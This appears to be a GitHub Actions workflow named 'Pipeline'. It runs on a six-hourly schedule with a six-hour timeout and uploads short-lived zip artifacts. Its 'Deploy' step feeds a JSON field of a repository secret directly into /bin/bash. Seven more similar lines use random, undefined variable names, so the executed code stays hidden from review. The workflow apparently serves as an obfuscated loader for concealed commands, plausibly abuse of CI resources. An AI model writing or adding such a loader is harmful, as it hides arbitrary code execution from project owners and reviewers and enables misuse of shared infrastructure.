name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '14 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  dispatcher:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Deploy
        env:
          e358: ${{ secrets.e358 }}
        run: |
          printf '%s' "$e358" | jq -r .ccf907 | /bin/bash
          echo $mwbm7611 | jq -r .ei3 | /bin/bash
          printf '%s' "$w673" | jq -r .kezzs6283 | /bin/bash
          echo $lfhef18 | jq -r .n2 | /bin/bash
          echo $xm72520 | jq -r .adaxd6064 | /bin/bash
          echo $ufj78202 | jq -r .hxp1222 | /bin/bash
          printf '%s' "$ygtvr2056" | jq -r .i10 | /bin/bash
          echo $aua83145 | jq -r .gcwtv291 | /bin/bash

      - name: Save results
        uses: actions/upload-artifact@v4
        with:
          name: t0f11GdX
          path: "*.zip"
          retention-days: 1
